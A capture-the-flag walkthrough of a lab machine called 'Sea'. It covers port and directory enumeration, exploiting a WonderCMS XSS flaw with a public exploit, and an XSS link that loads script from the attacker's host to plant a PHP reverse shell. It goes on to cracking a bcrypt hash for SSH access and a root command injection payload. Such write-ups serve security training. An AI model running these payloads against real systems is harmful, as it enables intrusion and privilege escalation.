Week 2. Sea

TL;DR

This is an Ubuntu 20.04 machine hosting a web site made with WonderCMS 3.2.0, a version vulnerable to XSS (CVE-2023-41425). Using an exploit available in GitHub we get an initial foothold. Then we find a Blowfish hash in a JS configuration file that, once cracked, allows us to move laterally to another user with enough permissions to read the first flag. Regarding escalation, we abuse an internal system monitoring web application under development that is running with root permissions, and turns out to be vulnerable to command injection.

KEYWORDS

WonderCMS 3.2.0, CVE-2023-41425, XSS, Blowfish, command injection.

REFERENCES

https://www.cvedetails.com/cve/CVE-2023-41425/

https://github.com/prodigiousMind/CVE-2023-41425

ENUMERATION

Port scan.

> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-11 16:49 EDT
Nmap scan report for 10.10.11.28
Host is up, received user-set (0.045s latency).
Not shown: 45417 closed tcp ports (conn-refused), 20116 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack
 
Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds

Enumerate the open ports.

> nmap $target -p22,80 -sV -sC -Pn -vv -n
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-11 16:50 EDT
Nmap scan report for 10.10.11.28
Host is up, received user-set (0.044s latency).
Scanned at 2024-08-11 16:50:39 EDT for 14s
 
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e354e072203c014293d1669d900cabe8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZDkHH698ON6uxM3eFCVttoRXc1PMUSj8hDaiwlDlii0p8K8+6UOqhJno4Iti+VlIcHEc2THRsyhFdWAygICYaNoPsJ0nhkZsLkFyu/lmW7frIwINgdNXJOLnVSMWEdBWvVU7owy+9jpdm4AHAj6mu8vcPiuJ39YwBInzuCEhbNPncrgvXB1J4dEsQQAO4+KVH+QZ5ZCVm1pjXTjsFcStBtakBMykgReUX9GQJ9Y2D2XcqVyLPxrT98rYy+n5fV5OE7+J9aiUHccdZVngsGC1CXbbCT2jBRByxEMn+Hl+GI/r6Wi0IEbSY4mdesq8IHBmzw1T24A74SLrPYS9UDGSxEdB5rU6P3t91rOR3CvWQ1pdCZwkwC4S+kT35v32L8TH08Sw4Iiq806D6L2sUNORrhKBa5jQ7kGsjygTf0uahQ+g9GNTFkjLspjtTlZbJZCWsz2v0hG+fzDfKEpfC55/FhD5EDbwGKRfuL/YnZUPzywsheq1H7F0xTRTdr4w0At8=
|   256 f3244b08aa519d56153d6756747c2038 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMMoxImb/cXq07mVspMdCWkVQUTq96f6rKz6j5qFBfFnBkdjc07QzVuwhYZ61PX1Dm/PsAKW0VJfw/mctYsMwjM=
|   256 30b105c64150ff22a37f41060e67fd50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHuXW9Vi0myIh6MhZ28W8FeJo0FRKNduQvcSzUAkWw7z
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds

Fuzz for hidden content.

> ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 100 -fc 404,403 -e .php,.html,.txt -u http://10.10.11.28/FUZZ
 
        /'___\  /'___\           /'___\      
       /\ \__/ /\ \__/  __  __  /\ \__/      
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
         \ \_\   \ \_\  \ \____/  \ \_\      
          \/_/    \/_/   \/___/    \/_/      
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.11.28/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Extensions       : .php .html .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200-299,301,302,307,401,405,500
 :: Filter           : Response status: 404,403
________________________________________________
 
index.php               [Status: 200, Size: 3670, Words: 582, Lines: 87, Duration: 62ms]
0                       [Status: 200, Size: 3670, Words: 582, Lines: 87, Duration: 42ms]
themes                  [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 39ms]
data                    [Status: 301, Size: 232, Words: 14, Lines: 8, Duration: 40ms]
plugins                 [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 57ms]
home                    [Status: 200, Size: 3670, Words: 582, Lines: 87, Duration: 7045ms]
contact.php             [Status: 200, Size: 2731, Words: 821, Lines: 119, Duration: 7047ms]
messages                [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 47ms]
404                     [Status: 200, Size: 3361, Words: 530, Lines: 85, Duration: 55ms]
:: Progress: [350600/350600] :: Job [1/1] :: 89 req/sec :: Duration: [0:09:36] :: Errors: 0 ::

In Burpsuite you can gather more information about the site sitemap

Fuzz again in the /themes/bike directory.

> ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 100 -fc 404,403 -e .php,.html,.txt,.md -u http://10.10.11.28/themes/bike/FUZZ
 
        /'___\  /'___\           /'___\      
       /\ \__/ /\ \__/  __  __  /\ \__/      
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
         \ \_\   \ \_\  \ \____/  \ \_\      
          \/_/    \/_/   \/___/    \/_/      
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.11.28/themes/bike/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Extensions       : .php .html .txt .md
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404,403
________________________________________________
 
404                     [Status: 200, Size: 3361, Words: 530, Lines: 85, Duration: 39ms]
LICENSE                 [Status: 200, Size: 1067, Words: 152, Lines: 22, Duration: 39ms]
README.md               [Status: 200, Size: 318, Words: 40, Lines: 16, Duration: 36ms]
css                     [Status: 301, Size: 243, Words: 14, Lines: 8, Duration: 39ms]
home                    [Status: 200, Size: 3670, Words: 582, Lines: 87, Duration: 127ms]
img                     [Status: 301, Size: 243, Words: 14, Lines: 8, Duration: 67ms]
summary                 [Status: 200, Size: 66, Words: 9, Lines: 2, Duration: 46ms]
theme.php               [Status: 500, Size: 227, Words: 37, Lines: 9, Duration: 41ms]
version                 [Status: 200, Size: 6, Words: 1, Lines: 2, Duration: 42ms]
:: Progress: [23565/23565] :: Job [1/1] :: 97 req/sec :: Duration: [0:00:37] :: Errors: 0 ::

Download and inspect the README.md file to get info about the CMS.

# WonderCMS bike theme
 
## Description
Includes animations.
 
## Author: turboblack
 
## Preview
![Theme preview](/preview.jpg)
 
## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.

Once we have disclosed the CMS is WonderCMS, we can obtain the version with curl

> curl http://10.10.11.28/themes/bike/version
3.2.0

Investigate this version of WonderCMS, it is impacted by this CVE: https://www.cvedetails.com/cve/CVE-2023-41425/

The machine is running a website made with a version of WonderCMS vulnerable to XSS. We have a potential point of entry for XSS in contact.php

USER

Download an exploit from: https://github.com/prodigiousMind/CVE-2023-41425

Follow the author's instructions: first, run the exploit to generate a xss.js file.

> python3 exploit.py http://10.10.14.28/index.php?page=loginURL 10.10.xxx.xxx 1919
[+] xss.js is created
[+] execute the below command in another terminal
 
----------------------------
nc -lvp 1919
----------------------------
 
send the below link to admin:
 
----------------------------
http://sea.htb/index.php?page=index.php?page=loginURL?"></form><script+src="http://10.10.14.147:8000/xss.js"></script><form+action="
----------------------------
 
 
starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.28 - - [15/Aug/2024 10:57:11] "GET /xss.js HTTP/1.1" 200 -

Note the /index.php?page=loginURL is taken from the exploit code, and is accessible via Firefox

The exploit outputs a file xss.js and returns a link to be inserted in the contact page. But before, we need to modify the xss.js file since it cannot be used as-is. You have to change the URL where the exploit downloads the shell.php from. By default the exploit points to a Github URL which does not work, so modify the reverse shell URL to point to your machine.

Now start a Python HTTP to serve the shell.php file (for example, use a PentestMonkey PHP shell) and insert the link in the contact.php form.

Shortly after the form is submitted, a request for xss.js file is received on the exploit's listener, along with a request for shell.php on out local Python HTTP server.

Now the reverse shell is stored in /themes/revshell-main/shell.php. Trigger it with curl

> curl -s 'http://10.10.11.28/themes/revshell-main/shell.php?lhost=10.10.14.147&lport=1919'

A reverse shell for user www-data is received on port 1919.

This user has read access to /var/www/sea/data/database.js, where we find a Blowfish hash.

 "config": {
        "siteTitle": "Sea",
        "theme": "bike",
        "defaultPage": "home",
        "login": "loginURL",
        "forceLogout": false,
        "forceHttps": false,
        "saveChangesPopup": false,
        "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
        "lastLogins": {
            "2024\/08\/15 16:32:24": "127.0.0.1",
            "2024\/08\/15 16:31:25": "10.10.16.45",
            "2024\/08\/15 16:31:23": "127.0.0.1",

This can be cracked with module 3200 (remove the escape chars from the hash).

> hashcat -m 3200 -a 0 -d 1 hash.txt .\rockyou.txt

Use the cracked password to SSH as amay (enumerate users in /home folder or in /etc/passwd).

Use this shell to a shell to retrieve the user flag.

ROOT

Start from the low-priv SSH shell for user amay, and take the opportunity to enumerate the user and the system.

> whoami && id
amay
uid=1000(amay) gid=1000(amay) groups=1000(amay)

> uname -a && cat /etc/os-release 
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

There is something running on port 8080.

> netstat -lnput
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                  
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                  
tcp        0      0 127.0.0.1:55775         0.0.0.0:*               LISTEN      -                  
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                  
tcp6       0      0 :::22                   :::*                    LISTEN      -                  
tcp6       0      0 :::80                   :::*                    LISTEN      -                  
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                  
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -

Forward to Kali and browse locally with Firefox, a system monitor application appears (use Amay's credentials to login).

Looks like it runs under root context since it allows system management, therefore candidate to command injection. Launch a log file analysis and capture with Burpsuite.

A POST request is sent with 2 parameters log_file and analyze_log.

After trying several payloads, we discover the log_file parameter is vulnerable to command injection.

The format of the payload is the following.

; uname -a #

There must be a blank space after the semicolon, and a hashtag at the end of the line. The semicolon is used to concatenate the commands, whereas the hashtag is necessary to comment anything after it (similar to SQL injections).

With this in mind, let's insert a reverse shell payload with Burpsuite and start a listener to capture it.

The received shell is not very stable but you'll have enough time to dump the root flag.

You are root.